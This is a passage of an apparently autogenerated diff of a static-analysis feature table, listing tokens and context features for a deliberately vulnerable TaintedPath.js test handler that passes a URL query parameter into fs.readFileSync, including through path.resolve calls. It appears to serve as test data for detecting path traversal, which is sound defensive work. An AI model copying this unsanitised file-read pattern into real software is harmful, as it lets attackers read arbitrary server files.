autogenerated/TaintedPath/TaintedPath.js:56:29:56:38 | pathModule | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:56:29:56:38 | pathModule | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:56:29:56:38 | pathModule | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:56:29:56:46 | pathModule.resolve | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:56:29:56:46 | pathModule.resolve | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:56:29:56:46 | pathModule.resolve | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:56:29:56:46 | pathModule.resolve | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:56:29:56:46 | pathModule.resolve | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:56:29:56:52 | exceptional return of pathMod ... e(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:56:29:56:52 | exceptional return of pathMod ... e(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:56:29:56:52 | exceptional return of pathMod ... e(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:56:29:56:52 | exceptional return of pathMod ... e(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:56:29:56:52 | exceptional return of pathMod ... e(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:56:29:56:52 | pathMod ... e(path) | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:56:29:56:52 | pathMod ... e(path) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:56:29:56:52 | pathMod ... e(path) | calleeImports | fs | @@ -5172,6 +60142,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:56:29:56:52 | pathMod ... e(path) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:56:29:56:52 | pathMod ... e(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:56:29:56:52 | pathMod ... e(path) | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:56:40:56:46 | resolve | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:56:40:56:46 | resolve | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:56:40:56:46 | resolve | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:56:40:56:46 | resolve | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:56:40:56:46 | resolve | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:56:48:56:51 | path | CalleeFlexibleAccessPath | pathModule.resolve | | autogenerated/TaintedPath/TaintedPath.js:56:48:56:51 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:56:48:56:51 | path | calleeImports | path | @@ -5181,6 +60156,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:56:48:56:51 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:56:48:56:51 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:56:48:56:51 | path | receiverName | pathModule | +| autogenerated/TaintedPath/TaintedPath.js:58:3:58:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:58:3:58:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:58:3:58:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:58:3:58:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:58:3:58:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:58:3:58:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:58:3:58:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:58:3:58:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:58:3:58:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:58:3:58:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:58:3:58:63 | exceptional return of res.wri ... h, z))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:58:3:58:63 | exceptional return of res.wri ... h, z))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:58:3:58:63 | exceptional return of res.wri ... h, z))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:58:3:58:63 | exceptional return of res.wri ... h, z))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:58:3:58:63 | exceptional return of res.wri ... h, z))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:58:3:58:63 | res.wri ... h, z))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:58:3:58:63 | res.wri ... h, z))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:58:3:58:63 | res.wri ... h, z))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:58:3:58:63 | res.wri ... h, z))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:58:3:58:63 | res.wri ... h, z))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:58:7:58:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:58:7:58:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:58:7:58:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:58:7:58:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:58:7:58:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:58:13:58:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:58:13:58:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:58:13:58:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:58:13:58:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:58:13:58:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:58:13:58:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:58:13:58:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:58:13:58:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:58:13:58:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:58:13:58:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:58:13:58:62 | exceptional return of fs.read ... th, z)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:58:13:58:62 | exceptional return of fs.read ... th, z)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:58:13:58:62 | exceptional return of fs.read ... th, z)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:58:13:58:62 | exceptional return of fs.read ... th, z)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:58:13:58:62 | exceptional return of fs.read ... th, z)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:58:13:58:62 | fs.read ... th, z)) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:58:13:58:62 | fs.read ... th, z)) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:58:13:58:62 | fs.read ... th, z)) | contextFunctionInterfaces | views_local(req, res) | @@ -5189,6 +60204,26 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:58:13:58:62 | fs.read ... th, z)) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:58:13:58:62 | fs.read ... th, z)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:58:13:58:62 | fs.read ... th, z)) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:58:16:58:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:58:16:58:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:58:16:58:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:58:16:58:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:58:16:58:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:58:29:58:38 | pathModule | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:58:29:58:38 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:58:29:58:38 | pathModule | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:58:29:58:38 | pathModule | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:58:29:58:38 | pathModule | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:58:29:58:46 | pathModule.resolve | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:58:29:58:46 | pathModule.resolve | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:58:29:58:46 | pathModule.resolve | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:58:29:58:46 | pathModule.resolve | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:58:29:58:46 | pathModule.resolve | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:58:29:58:61 | exceptional return of pathMod ... ath, z) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:58:29:58:61 | exceptional return of pathMod ... ath, z) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:58:29:58:61 | exceptional return of pathMod ... ath, z) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:58:29:58:61 | exceptional return of pathMod ... ath, z) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:58:29:58:61 | exceptional return of pathMod ... ath, z) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:58:29:58:61 | pathMod ... ath, z) | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:58:29:58:61 | pathMod ... ath, z) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:58:29:58:61 | pathMod ... ath, z) | calleeImports | fs | @@ -5198,6 +60233,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:58:29:58:61 | pathMod ... ath, z) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:58:29:58:61 | pathMod ... ath, z) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:58:29:58:61 | pathMod ... ath, z) | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:58:40:58:46 | resolve | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:58:40:58:46 | resolve | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:58:40:58:46 | resolve | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:58:40:58:46 | resolve | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:58:40:58:46 | resolve | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:58:48:58:48 | x | CalleeFlexibleAccessPath | pathModule.resolve | | autogenerated/TaintedPath/TaintedPath.js:58:48:58:48 | x | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:58:48:58:48 | x | calleeImports | path | @@ -5234,6 +60274,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:58:60:58:60 | z | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:58:60:58:60 | z | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:58:60:58:60 | z | receiverName | pathModule | +| autogenerated/TaintedPath/TaintedPath.js:60:3:60:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:60:3:60:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:60:3:60:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:60:3:60:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:60:3:60:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:60:3:60:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:60:3:60:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:60:3:60:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule 